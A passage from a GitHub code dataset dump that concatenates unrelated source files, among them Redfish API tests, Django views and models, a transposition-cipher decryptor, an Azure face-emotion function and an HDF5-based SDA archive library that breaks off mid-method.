test_get_network_device_function_collection_sh_not_found(self):\n \"\"\"Tests NetworkDeviceFunctionCollection\"\"\"\n\n e = HPOneViewException({\n 'errorCode': 'RESOURCE_NOT_FOUND',\n 'message': 'server-hardware not found',\n })\n self.oneview_client.server_hardware.get_by_id.side_effect = e\n\n # Get NetworkDeviceFunctionCollection\n response = self.client.get(\n \"/redfish/v1/Chassis/30303437-3034-4D32-3230-313133364752/\"\n \"NetworkAdapters/3/NetworkDeviceFunctions/\"\n )\n\n self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)\n self.assertEqual(\"application/json\", response.mimetype)\n\n def test_get_network_device_function_collection_sh_exception(self):\n \"\"\"Tests NetworkDeviceFunctionCollection\"\"\"\n\n e = HPOneViewException({\n 'errorCode': 'ANOTHER_ERROR',\n 'message': 'server-hardware-types error',\n })\n self.oneview_client.server_hardware.get_by_id.side_effect = e\n\n # Get NetworkDeviceFunctionCollection\n response = self.client.get(\n \"/redfish/v1/Chassis/30303437-3034-4D32-3230-313133364752/\"\n \"NetworkAdapters/3/NetworkDeviceFunctions/\"\n )\n\n self.assertEqual(\n status.HTTP_500_INTERNAL_SERVER_ERROR,\n response.status_code\n )\n self.assertEqual(\"application/json\", response.mimetype)\n\n @mock.patch.object(RedfishJsonValidator, \"get_resource_by_id\")\n def test_get_network_device_function_collection_empty(self,\n get_resource_by_id):\n \"\"\"Tests NetworkDeviceFunctionCollection with empty list\"\"\"\n\n # Loading NetworkDeviceFunctionCollectionEmpty mockup result\n with open(\n 'oneview_redfish_toolkit/mockups/redfish/'\n 'NetworkDeviceFunctionCollectionEmpty.json'\n ) as f:\n network_device_function_collection_mockup = json.load(f)\n\n # Create mock response\n serverhw_obj = ServerHardware(\n self.oneview_client, self.server_hardware)\n self.oneview_client.server_hardware.get_by_id.return_value = \\\n serverhw_obj\n\n # Get NetworkDeviceFunctionCollection\n response = self.client.get(\n \"/redfish/v1/Chassis/30303437-3034-4D32-3230-313133364752/\"\n \"NetworkAdapters/3/NetworkDeviceFunctions/\"\n )\n\n # Gets json from response\n result = json.loads(response.data.decode(\"utf-8\"))\n\n # Tests response\n self.assertEqual(status.HTTP_200_OK, response.status_code)\n self.assertEqual(\"application/json\", response.mimetype)\n self.assertEqualMockup(network_device_function_collection_mockup,\n result)\n","repo_name":"HewlettPackard/oneview-redfish-toolkit","sub_path":"oneview_redfish_toolkit/tests/blueprints/test_network_device_function_collection.py","file_name":"test_network_device_function_collection.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"6"} +{"seq_id":"17549472746","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"about/\", views.about, name=\"about\"),\n path(\"rooms/\", views.rooms, name=\"rooms\"),\n path(\"help/\", views.room, name=\"help\"),\n path(\"contact/\", views.room, name=\"contact\"),\n path(\"room//\", views.room, name=\"viewRoom\"),\n]\n","repo_name":"mamin11/django-hotel","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38903174194","text":"import chainer\nfrom chainer import links as L, functions as F, reporter\n\n\nclass TextClassifier(chainer.Chain):\n\n \"\"\"A classifier using a given encoder.\n\n This chain encodes a sentence and classifies it into classes.\n\n Args:\n encoder (Link): A callable encoder, which extracts a feature.\n Input is a list of variables whose shapes are\n \"(sentence_length, )\".\n Output is a variable whose shape is \"(batchsize, n_units)\".\n n_class (int): The number of classes to be predicted.\n\n \"\"\"\n\n def __init__(self, encoder, n_class, dropout=0.1):\n super(TextClassifier, self).__init__()\n with self.init_scope():\n self.encoder = encoder\n self.output = L.Linear(encoder.out_units, n_class)\n self.dropout = dropout\n\n def __call__(self, xs, ys):\n concat_outputs = self.predict(xs)\n concat_truths = F.concat(ys, axis=0)\n\n loss = F.softmax_cross_entropy(concat_outputs, concat_truths)\n accuracy = F.accuracy(concat_outputs, concat_truths)\n reporter.report({'loss': loss.data}, self)\n reporter.report({'accuracy': accuracy.data}, self)\n return loss\n\n def predict(self, xs, softmax=False, argmax=False):\n concat_encodings = F.dropout(self.encoder(xs), ratio=self.dropout)\n concat_outputs = self.output(concat_encodings)\n if softmax:\n return F.softmax(concat_outputs).data\n elif argmax:\n return self.xp.argmax(concat_outputs.data, axis=1)\n else:\n return concat_outputs","repo_name":"elangovana/sentimentanalysis-chainer-sagemaker","sub_path":"custom_chainer/TextClassifier.py","file_name":"TextClassifier.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72532095549","text":"import sqlalchemy as sa\n\nfrom ..tables import users\nfrom ._base import BaseRepository\n\n\nclass UsersRepository(BaseRepository):\n async def get_email_from_user_id(self, user_id: int) -> str | None:\n stmt = sa.select(\n [\n users.c.email,\n ]\n ).where(users.c.id == user_id)\n async with self.db_engine.acquire() as conn:\n email: str | None = await conn.scalar(stmt)\n return email\n","repo_name":"ITISFoundation/osparc-simcore","sub_path":"services/api-server/src/simcore_service_api_server/db/repositories/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"6"} +{"seq_id":"27950634817","text":"import string\n\ndef main():\n \n print(\"-This program decrypts cipher text from a double transposition cipher.\")\n print(\"-The program is provided two keys from unwrappedKeys.txt and cipher text from AliceCipherText.txt\")\n \n keys = get_keys()\n print(\"Keys to be used: \" + keys[0] + \", \" + keys[1])\n \n ciphertext = read_file(\"AliceCipherText.txt\")\n print(\"Cipher text to be decrypted: \" + ciphertext)\n \n plaintext1 = decrypt(ciphertext, keys[1])\n plaintext2 = decrypt(plaintext1, keys[0])\n \n plaintext_final = remove_xx(plaintext2)\n \n print(\"Decrypted message: \" + plaintext_final)\n write_file(\"decryptedMessage.txt\", plaintext_final)\n print(\"Decrypted message written to decryptedMessage.txt\")\n\ndef get_keys():\n \n key_text = read_file(\"unwrappedKeys.txt\")\n keys = [None, None]\n key1 = \"\"\n key2 = \"\"\n \n for char in key_text:\n if char is ' ':\n break\n else:\n key1 += char\n \n for char in key_text[key_text.index(' '):]:\n if char is ' ':\n continue\n else:\n key2 += char\n \n keys[0] = key1\n keys[1] = key2\n \n return keys\n \ndef read_file(filename):\n \n file = open(filename, \"r\")\n if file.mode == \"r\":\n plaintext = file.read()\n \n new_plaintext = \"\"\n \n for char in plaintext:\n if char is '\\n' or char is '.':\n continue\n else:\n new_plaintext = new_plaintext + char\n \n file.close()\n return new_plaintext\n\ndef write_file(filename, contents):\n \n file = open(filename, \"w\")\n file.write(contents)\n file.close()\n \ndef get_order(key):\n \n ordering = list()\n for i in range(0,10):\n ordering.append(0)\n \n for i in range(0,10):\n ordering[i] = string.ascii_lowercase.index(key[i]) + 1\n \n finished = False\n ordering_temp = ordering[:]\n rank = 1\n while finished is False:\n minimum = min(ordering_temp)\n index = ordering.index(minimum)\n ordering[index] = rank\n rank = rank + 1\n ordering_temp.remove(minimum)\n if not ordering_temp:\n finished = True\n \n return ordering\n\ndef remove_xx(plaintext):\n \n new_text = \"\"\n for i in range(0, len(plaintext)):\n if i + 1 >= len(plaintext):\n break\n elif (plaintext[i] == 'X' and plaintext[i+1] == 'X') or (plaintext[i] == 'X' and plaintext[i-1] == 'X'):\n if new_text[len(new_text)-1] != ' ':\n new_text = new_text + ' '\n continue\n else:\n new_text = new_text + plaintext[i]\n \n new_text = new_text.strip()\n return new_text\n\ndef decrypt(plaintext, key):\n \n transpose = [None, None, None, None, None, None, None, None, None, None]\n \n for i in range(0,10):\n transpose[i] = list()\n \n transpose_depth = int(len(plaintext) / 10)\n \n ordering = get_order(key)\n ordering_place = 1\n \n temp_matrix = [None, None, None, None, None, None, None, None, None, None]\n \n for i in range(0,10):\n temp_matrix[i] = list()\n \n text_index = 0\n temp_matrix_index = 0\n \n for text_index in range(0, len(plaintext)):\n if len(temp_matrix[temp_matrix_index]) == transpose_depth:\n temp_matrix_index = temp_matrix_index + 1\n \n temp_matrix[temp_matrix_index].append(plaintext[text_index])\n text_index = text_index + 1 \n \n for char_list in temp_matrix:\n transpose_index = ordering.index(ordering_place)\n transpose[transpose_index] = char_list\n if ordering_place == 10:\n break\n else:\n ordering_place = ordering_place + 1\n \n decrypted = \"\"\n \n i = 0\n j = 0\n \n while True:\n if len(decrypted) == transpose_depth * 10:\n break\n if (i > 9) and (j > transpose_depth-1):\n continue\n else:\n decrypted = decrypted + transpose[i][j]\n if (i==9):\n i = 0\n j = j+1\n else:\n i = i + 1\n \n return decrypted\n \nif __name__ == \"__main__\":\n main()","repo_name":"zachklaus/past-projects","sub_path":"Python Projects/RSA/transposition-decr.py","file_name":"transposition-decr.py","file_ext":"py","file_size_in_byte":4165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11239752194","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom countries.models import Country\nfrom django.template.defaultfilters import slugify\n\nclass Autor(models.Model):\n pais = models.ForeignKey(Country, blank=True, null=True, related_name='autores')\n nombre = models.CharField(max_length=50)\n apellido = models.CharField(max_length=50)\n \n class Meta:\n db_table='Autor'\n verbose_name='autor'\n verbose_name_plural='autores'\n \n def __unicode__(self):\n return self.nombre + ' ' + self.apellido\n \nclass Pieza(models.Model):\n from usuarios.models import Perfil\n\n codigo = models.CharField(primary_key=True, max_length=20)\n clasificacion = models.ForeignKey('Clasificacion', related_name='piezas')\n autor = models.ForeignKey(Autor, blank=True, null=True, related_name='creaciones')\n responsableRegistro = models.ForeignKey(Perfil, related_name='piezas_registradas')\n registroIDAEH = models.BooleanField(default=False, blank=True)\n codigoIDAEH = models.CharField(max_length=25, blank=True, null=False)\n archivoIDAEH = models.URLField(blank=True, null=True)\n nombre = models.CharField(max_length=140, blank=True)\n descripcion = models.TextField()\n fechaIngreso = models.DateField(auto_now=True)\n procedencia = models.CharField(max_length=50, blank=True)\n pais = models.ForeignKey(Country, blank=True, null=True, related_name='piezas')\n regionCultural = models.SmallIntegerField(blank=True, null=True)\n observaciones = models.TextField(blank=True)\n maestra = models.BooleanField(default=False, blank=True)\n exhibicion = models.BooleanField(default=False, blank =True)\n altura = models.FloatField(blank=True, null=True)\n ancho = models.FloatField(blank=True, null=True)\n grosor = models.FloatField(blank=True, null=True)\n largo = models.FloatField(blank=True, null=True)\n diametro = models.FloatField(blank=True, null=True)\n fechamiento = models.CharField(blank=True, null=True, max_length=100)\n resumen = models.CharField(blank=True, null=True, max_length=140)\n \n class Meta:\n db_table='Pieza'\n verbose_name='pieza'\n verbose_name_plural='piezas'\n \n def get_profile_image(self):\n try:\n foto = Fotografia.objects.filter(pieza = self).all()\n return foto.get(perfil=True).ruta\n except:\n return \"\"\n def get_categoria(self):\n return unicode(self.clasificacion.categoria)\n \n def get_coleccion(self):\n return unicode(self.clasificacion.coleccion)\n \n def get_clasificacion(self):\n return unicode(self.clasificacion)\n def __unicode__(self):\n return self.codigo\n \n def get_statistcs(self):\n colecciones = {}\n colecciones['colecciones'] = Coleccion.objects.count()\n colecciones['clasificaciones'] = Clasificacion.objects.count()\n colecciones['categorias'] = Categoria.objects.count()\n colecciones['piezas'] = Pieza.objects.count()\n return colecciones\n \nclass Fotografia(models.Model):\n from operaciones.models import Mantenimiento\n mantenimiento = models.ForeignKey(Mantenimiento, blank=True, null=True, related_name='fotografias')\n pieza = models.ForeignKey('Pieza', blank=True, null=True)\n tipo = models.SmallIntegerField(blank=True)\n ruta = models.URLField()\n perfil = models.BooleanField(default=True)\n \n class Meta:\n db_table='Fotografia'\n verbose_name='fotografía'\n verbose_name_plural='fotografías'\n def __unicode__(self):\n return unicode(self.ruta)\n \nclass Clasificacion(models.Model):\n from registro.models import Ficha\n coleccion = models.ForeignKey('Coleccion', related_name=\"clasificaciones\")\n categoria = models.ForeignKey('Categoria', related_name=\"clasificaciones\")\n ficha = models.ForeignKey(Ficha, null=True, blank=True, related_name=\"clasificaciones\")\n nombre = models.CharField(max_length=50, null=False)\n codigo = models.CharField(max_length=50, unique=True)\n class Meta:\n db_table='Clasificacion'\n verbose_name='clasificación'\n verbose_name_plural = 'clasificaciones'\n \n def __unicode__(self):\n return self.nombre\n\nclass Categoria(models.Model):\n nombre = models.CharField(max_length=50, unique=True)\n colecciones = models.ManyToManyField('Coleccion', through='Clasificacion')\n class Meta: \n db_table='Categoria'\n verbose_name='categoría'\n verbose_name_plural='categorías'\n \n def __unicode__(self):\n return self.nombre\n\nclass Coleccion(models.Model):\n nombre = models.CharField(max_length=50, unique=True)\n categorias = models.ManyToManyField('Categoria', through= 'Clasificacion')\n class Meta:\n db_table='Coleccion'\n verbose_name='Colección'\n verbose_name_plural='Colecciones' \n \n def __unicode__(self):\n return self.nombre","repo_name":"museoXela/API","sub_path":"bicefalo/piezas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"45010598","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\nfrom sklearn.metrics import pairwise_distances\n\n\ndef create_graph(df_sushi, plot=True, score_par=1, approximate=None):\n\n score_par = 1 / np.median(pairwise_distances(df_sushi))\n metric = lambda x: np.exp(-score_par * pairwise_distances(x, metric=\"euclidean\"))\n similarities = metric(df_sushi.values)\n\n if not approximate is None:\n prova = np.triu(similarities)\n prova = prova[prova != 0]\n true = prova[prova != 1]\n th = np.quantile(true, approximate)\n else:\n th = 0\n\n G = nx.Graph()\n for i, sushi in enumerate(df_sushi.index):\n G.add_node(i, name=i)\n\n for i in range(len(df_sushi)):\n for j in range(len(df_sushi)):\n if i == j or similarities[i, j] < th:\n continue\n attr = {\"weight\": similarities[i, j]}\n # attr = {\"weight\" : 1-similarities[i,j]}\n G.add_edge(i, j, **attr)\n\n if not plot:\n return G, similarities\n\n print(similarities.round(2))\n\n return G, similarities\n","repo_name":"MichelangeloConserva/CutFunctionKernel","sub_path":"interleaving/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21221546020","text":"import azureconfig\nfrom azure.cognitiveservices.vision.face import FaceClient\nfrom msrest.authentication import CognitiveServicesCredentials\n\n\n# noinspection DuplicatedCode\ndef ow_handler(request):\n\n\t# search for image url in request\n\tif request.get('body').get('url') is not None:\n\t\turl = request.get('body').get('url')\n\telse:\n\t\traise Exception('Missing argument in anger detection')\n\n\t# perform image analysis and return response\n\tresult = detect_anger(url)\n\treturn {\n\t\t'value': bool(result)\n\t}\n\n\ndef detect_anger(image) -> bool:\n\n\t# prepare request\n\t# noinspection PyTypeChecker\n\tclient = FaceClient(azureconfig.endpoint, CognitiveServicesCredentials(azureconfig.key))\n\tattributes = [\"emotion\"]\n\tinclude_id = False\n\tinclude_landmarks = False\n\n\t# perform request and analyze result\n\tresponse = client.face.detect_with_url(image, include_id, include_landmarks, attributes, raw=False)\n\tfor result in response:\n\t\tif result.face_attributes.emotion.anger is not None and result.face_attributes.emotion.anger >= 0.6:\n\t\t\treturn True\n\treturn False\n","repo_name":"fmarino-412/ServerlessFlowBench","sub_path":"serverless_functions/openwhisk/python/face_recognition/anger_detection/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"575309128","text":"from graphics import *\r\nfrom time import sleep\r\n\r\n#create a scary image for halloween\r\n# we shall make a Jack'o'Lantern\r\n\r\nwin=GraphWin('Assignment 3 - Problem 3 - Scary Pumpkin',600,400)\r\nwin.setBackground('darkgrey')\r\n\r\npumpkin=Circle(Point(300,200),150)\r\npumpkin.setFill('orange')\r\npumpkin.draw(win)\r\n\r\nleye=Polygon(Point(200,150),Point(250,150),Point(225,200))\r\nleye.setFill('black')\r\nleye.draw(win)\r\n\r\nreye=Polygon(Point(400,150),Point(350,150),Point(375,200))\r\nreye.setFill('black')\r\nreye.draw(win)\r\n\r\nmouth=Polygon(Point(225,250),Point(250,320), Point(300,275),Point(350,320),Point(375,250),Point(300,225))\r\nmouth.setFill('black')\r\nmouth.draw(win)\r\n\r\nstem=Polygon(Point(300,20),Point(310,30),Point(320,60),Point(270,60),Point(300,40))\r\nstem.setFill('green')\r\nstem.draw(win)\r\n\r\n\r\nfor i in range(1000):\r\n stem.move(3,3)\r\n sleep(0.001)\r\n stem.move(-3,-3)\r\n sleep(0.001)\r\n \r\n","repo_name":"MrColwell/PythonProfessionalLearning","sub_path":"PythonForTeachers/studentExercises/A3_3.py","file_name":"A3_3.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43626531804","text":"from typing import List\n\n\nclass Solution(object):\n def numBusesToDestination(self, routes: List[List[int]], source: int, target: int) -> int:\n if source == target:\n return 0\n hashmap = {}\n for i in range(len(routes)):\n for j in range(len(routes[i])):\n if routes[i][j] not in hashmap:\n hashmap[routes[i][j]] = []\n hashmap[routes[i][j]].append(i)\n queue = []\n addedRoute = set()\n addedStop = set()\n for r in hashmap[source]:\n if r in addedRoute: continue\n for i in range(len(routes[r])):\n if routes[r][i] not in addedStop:\n queue.append(routes[r][i])\n addedStop.add(routes[r][i])\n addedRoute.add(r)\n count = 0\n while queue:\n size = len(queue)\n count += 1\n for _ in range(size):\n stop = queue.pop(0)\n if stop == target:\n return count\n for r in hashmap[stop]:\n if r in addedRoute: continue\n for i in range(len(routes[r])):\n if routes[r][i] not in addedStop:\n queue.append(routes[r][i])\n addedRoute.add(r)\n return -1\n\n\n\n def test(self):\n testCases = [\n [\n [[1, 2, 7], [3, 6, 7]],\n 1, 6,\n ], # 2\n [\n [[7,12],[4,5,15],[6],[15,19],[9,12,13]],\n 15,12\n ],\n ]\n for routes, s, t in testCases:\n result = self.numBusesToDestination(routes, s, t)\n print('result: %s' % result)\n print('-='*30+'-')\n\n\n\nif __name__ == '__main__':\n Solution().test()\n","repo_name":"MichaelTQ/LeetcodePythonProject","sub_path":"solutions/leetcode_0801_0850/LeetCode815_BusRoutes.py","file_name":"LeetCode815_BusRoutes.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10677337752","text":"from django.shortcuts import render\nimport pandas as pd \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\ndef home(request):\n return render(request, 'home.html')\n\ndef predict(request):\n return render(request, 'predict.html')\n\ndef result(request):\n diabetes_dataset = pd.read_csv('/home/tarib/Desktop/DP1-main/diabetes.csv')\n\n Y = diabetes_dataset['Outcome']\n X = diabetes_dataset.drop('Outcome', axis=1)\n\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n model = LogisticRegression(max_iter=1000)\n model.fit(X_train, Y_train)\n\n val1 = float(request.GET['n1'])\n val2 = float(request.GET['n2'])\n val3 = float(request.GET['n3'])\n val4 = float(request.GET['n4'])\n val5 = float(request.GET['n5'])\n val6 = float(request.GET['n6'])\n val7 = float(request.GET['n7'])\n val8 = float(request.GET['n8'])\n\n pred = model.predict([[val1, val2, val3, val4, val5, val6, val7, val8]])\n\n result1 = \"\"\n\n if pred == 1:\n result1 = \"You have diabetes\"\n else:\n result1 = \"You don't have diabetes\"\n\n return render(request, 'predict.html', {\"result2\": result1})\n","repo_name":"biratdatta/DP1-main","sub_path":"diabetesprediction/diabetesprediction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21315685300","text":"\"\"\" Implementation of ``SDAFile`` for working with SDA files.\n\nThe SDA format was designed to be universal to facilitate data sharing across\nmultiple languages. It supports reading and updating all record types, except\n*function* records. It support writing *numeric*, *logical*, *cell*, and\n*structure* records.\n\n\"\"\"\n\nfrom contextlib import contextmanager\nfrom functools import partial\nimport os\nimport os.path as op\nimport re\nimport shutil\nimport tempfile\n\nimport h5py\nimport numpy as np\n\nfrom .extract import extract\nfrom .record_inserter import InserterRegistry\nfrom .utils import (\n are_signatures_equivalent, error_if_bad_header, error_if_not_writable,\n get_decoded, is_valid_writable, set_encoded, unnest, unnest_record,\n update_header, validate_structures, write_header,\n)\n\n\nWRITE_MODES = ('w', 'w-', 'x', 'a')\n\n\nclass SDAFile(object):\n \"\"\" Read, write, inspect, and manipulate Sandia Data Archive files.\n\n This supports version 1.1 of the Sandia Data Archive format.\n\n \"\"\"\n\n def __init__(self, name, mode='a', **kw):\n \"\"\" Open an SDA file for reading, writing, or interrogation.\n\n Parameters\n ----------\n name : str\n The name of the file to be loaded or created.\n mode : str\n r Read-only, file must exist\n r+ Read/write, file must exist\n w Create file, truncate if exists\n w- or x Create file, fail if exists\n a Read/write if exists, create otherwise (default)\n kw :\n Key-word arguments that are passed to the underlying HDF5 file. See\n h5py.File for options.\n\n \"\"\"\n file_exists = op.isfile(name)\n self._mode = mode\n self._filename = name\n self._kw = kw\n self._registry = InserterRegistry()\n\n # Check existence\n if mode in ('r', 'r+') and not file_exists:\n msg = \"File '{}' does not exist\".format(name)\n raise IOError(msg)\n\n # Check the header when mode requires the file to exist\n if mode in ('r', 'r+') or (file_exists and mode == 'a'):\n with self._h5file('r') as h5file:\n error_if_bad_header(h5file)\n\n # Check that file is writable when mode will write to file.\n if mode != 'r':\n with self._h5file('a') as h5file:\n error_if_not_writable(h5file)\n\n # Create the header if this is a new file\n if mode in ('w', 'w-', 'x') or (not file_exists and mode == 'a'):\n with self._h5file(mode) as h5file:\n write_header(h5file.attrs)\n\n # File properties\n\n @property\n def name(self):\n \"\"\" File name on disk. \"\"\"\n return self._filename\n\n @property\n def mode(self):\n \"\"\" Mode used to open file. \"\"\"\n return self._mode\n\n # Format attrs\n\n @property\n def FileFormat(self):\n \"\"\" The 'FileFormat' file attribute. \"\"\"\n return self._get_attr('FileFormat')\n\n @property\n def FormatVersion(self):\n \"\"\" The format version from the SDA file. \"\"\"\n return self._get_attr('FormatVersion')\n\n @property\n def Writable(self):\n \"\"\" The 'Writable' flag from the SDA file. \"\"\"\n return self._get_attr('Writable')\n\n @Writable.setter\n def Writable(self, value):\n if self._mode not in WRITE_MODES:\n raise ValueError(\"File is not writable.\")\n if not is_valid_writable(value):\n raise ValueError(\"Must be 'yes' or 'no'\")\n with self._h5file('r+') as h5file:\n set_encoded(h5file.attrs, Writable=value)\n\n @property\n def Created(self):\n \"\"\" The time the file was created. \"\"\"\n return self._get_attr('Created')\n\n @property\n def Updated(self):\n \"\"\" The time the file was last updated. \"\"\"\n return self._get_attr('Updated')\n\n # Public\n def describe(self, label, description=''):\n \"\"\" Change the description of a data entry.\n\n Parameters\n ----------\n label : str\n The data label.\n description : str\n A description to accompany the data\n\n Raises\n ------\n ValueError if the label contains invalid characters\n ValueError if the label does not exist\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(label, must_exist=True)\n with self._h5file('r+') as h5file:\n set_encoded(h5file[label].attrs, Description=description)\n update_header(h5file.attrs)\n\n def extract(self, label):\n \"\"\" Extract data from an SDA file.\n\n Parameters\n ----------\n label : str\n The data label.\n\n Returns\n -------\n data : object\n Archive data associated with the label.\n\n Notes\n -----\n Sparse numeric data is extracted as\n :class:`coo_matrix`. This format does\n not support all numpy operations.\n\n Raises\n ------\n ValueError if the label contains invalid characters\n ValueError if the label does not exist\n\n \"\"\"\n self._validate_labels(label, must_exist=True)\n with self._h5file('r') as h5file:\n return extract(h5file, label)\n\n def extract_to_file(self, label, path, overwrite=False):\n \"\"\" Extract a file record to file.\n\n Parameters\n ----------\n label : str\n Label of the file record.\n path : str\n The path to which the file is to be written.\n overwrite : bool, optional\n Unless specified as True, an existing file with the chosen name\n will not be overwritten by this method.\n\n Raises\n ------\n IOError if `overwrite` is False and the destintation file exists.\n\n \"\"\"\n\n if op.exists(path) and not overwrite:\n raise IOError(\"File '{}' exists. Will not overwrite.\".format(path))\n self._validate_labels(label, must_exist=True)\n\n # Check that archive is a file archive\n record_type = self._get_attr('RecordType', root=label)\n if record_type != 'file':\n raise ValueError(\"'{}' is not a file record\".format(label))\n\n with open(path, 'wb') as f:\n f.write(self.extract(label))\n\n def insert(self, label, data, description='', deflate=0,\n as_structures=False):\n \"\"\" Insert data into an SDA file.\n\n Parameters\n ----------\n label : str\n The data label.\n data :\n The data to insert. See the notes below.\n description : str, optional\n A description to accompany the data\n deflate : int, optional\n An integer value from 0 to 9, specifying the compression level to\n be applied to the stored data.\n as_record : bool, optional\n If specified, data that is storable as a cell record and has\n homogenous cells will be stored as a \"structures\" record. Note that\n this does not extend to nested cell records.\n\n Raises\n ------\n ValueError if the data is of an unsupported type\n ValueError if the label contains invalid characters\n ValueError if the label exists\n ValueError if `as_structures` is True and the data cannot be stored as\n a structures record.\n\n Notes\n -----\n This stores specific data types as described here.\n\n sequences :\n Lists, tuples, and anything else that identifies as a\n collections.abc.Sequence are stored as 'cell' records, no matter\n the contents.\n\n dicts :\n Dictionaries are stored as 'structure' records.\n\n numpy arrays :\n If the dtype is a supported numeric type, then a numpy array is\n stored as a 'numeric' record. Arrays of 'bool' type are stored as\n 'logical' records. Arrays of characters (dtype 'S1') are stored as\n 'character' records. Object and string arrays are stored as 'cell'\n records.\n\n sparse arrays (:class:`coo_matrix`) :\n These are stored as 'numeric' records if the dtype is a type\n supported for numeric numpy arrays.\n\n strings :\n Strings are stored as 'character' records. An attempt will be\n made to convert the input to ascii encoded bytes, no matter the\n underlying encoding. This may result in an encoding exception if\n the input cannot be ascii encoded.\n\n non-string scalars :\n Non-string scalars are stored as 'numeric' if numeric, or 'logical'\n if boolean.\n\n file-like :\n The contents of a file-like objects (with a 'read' method) are\n stored as 'file' records.\n\n other :\n Arrays of characters are not supported. Convert to a string.\n Object arrays are not supported. Cast to another dtype or turn into\n a list.\n\n Anything not listed above is not (intentionally) supported.\n\n See Also\n --------\n insert_from_file : Insert contents of a named file.\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(label, can_exist=False)\n if not isinstance(deflate, (int, np.integer)) or not 0 <= deflate <= 9:\n msg = \"'deflate' must be an integer from 0 to 9\"\n raise ValueError(msg)\n cls = self._registry.get_inserter(data)\n if cls is None:\n msg = \"{!r} is not a supported type\".format(data)\n raise ValueError(msg)\n\n inserter = cls(label, data, deflate, self._registry)\n\n if as_structures:\n if inserter.record_type != 'cell':\n msg = \"Data cannot be stored as a 'structures' record.\"\n raise ValueError(msg)\n\n validate_structures(data, self._registry)\n\n # Tell the inserter to use the 'structures' record type\n inserter.record_type = 'structures'\n\n with self._h5file('r+') as h5file:\n try:\n inserter.insert(h5file, description)\n except Exception:\n # Do not leave things in an invalid state\n if label in h5file:\n del h5file[label]\n raise\n else:\n update_header(h5file.attrs)\n\n def insert_from_file(self, path, description='', deflate=0):\n \"\"\" Insert the contents of a file as a file record.\n\n Parameters\n ----------\n path : str\n The path to the file. The basename of the path will be used as the\n record label.\n description : str, optional\n A description to accompany the data\n deflate : int, optional\n An integer value from 0 to 9, specifying the compression level to\n be applied to the stored data.\n\n Returns\n -------\n label : str\n The label under which the file was stored.\n\n See Also\n --------\n insert : Insert data into the archive\n\n \"\"\"\n if not op.isfile(path):\n raise ValueError(\"File '{}' does not exist\".format(path))\n\n label = op.basename(path)\n with open(path, 'rb') as f:\n self.insert(label, f, description, deflate)\n return label\n\n def labels(self):\n \"\"\" Get data labels from the archive.\n\n Returns\n -------\n labels : list of str\n Labels from the archive.\n\n \"\"\"\n with self._h5file('r') as h5file:\n return list(h5file.keys())\n\n def remove(self, *labels):\n \"\"\" Remove specified records from the archive.\n\n This cannot be undone.\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(labels, must_exist=True)\n\n # Create a new file so space is actually freed\n def _copy_visitor(path, source, destination, labels):\n \"\"\" Visitor that copies data from source to destination \"\"\"\n\n # Skip paths corresponding to excluded labels\n if path.split('/')[0] in labels:\n return\n\n # Copy everything else\n source_obj = source[path]\n if isinstance(source_obj, h5py.Group):\n dest_obj = destination.create_group(path)\n else:\n ds = source_obj\n dest_obj = destination.create_dataset(\n path,\n data=source_obj[()],\n chunks=ds.chunks,\n maxshape=ds.maxshape,\n compression=ds.compression,\n compression_opts=ds.compression_opts,\n scaleoffset=ds.scaleoffset,\n shuffle=ds.shuffle,\n fletcher32=ds.fletcher32,\n fillvalue=ds.fillvalue,\n )\n\n dest_obj.attrs.update(source_obj.attrs)\n\n pid, destination_path = tempfile.mkstemp()\n os.close(pid)\n with h5py.File(destination_path, 'w') as destination:\n with self._h5file('r') as source:\n destination.attrs.update(source.attrs)\n source.visit(\n partial(\n _copy_visitor,\n source=source,\n destination=destination,\n labels=set(labels),\n\n )\n )\n update_header(destination.attrs)\n shutil.move(destination_path, self._filename)\n\n def probe(self, pattern=None):\n \"\"\" Summarize the state of the archive\n\n This requires the pandas package.\n\n Parameters\n ----------\n pattern : str or None, optional\n A search pattern (python regular expression) applied to find\n archive labels of interest. If None, all labels are selected.\n\n Returns\n -------\n summary : :class:`DataFrame`\n A table summarizing the archive.\n\n \"\"\"\n from pandas import DataFrame\n labels = self.labels()\n if pattern is not None:\n regex = re.compile(pattern)\n labels = [\n label for label in 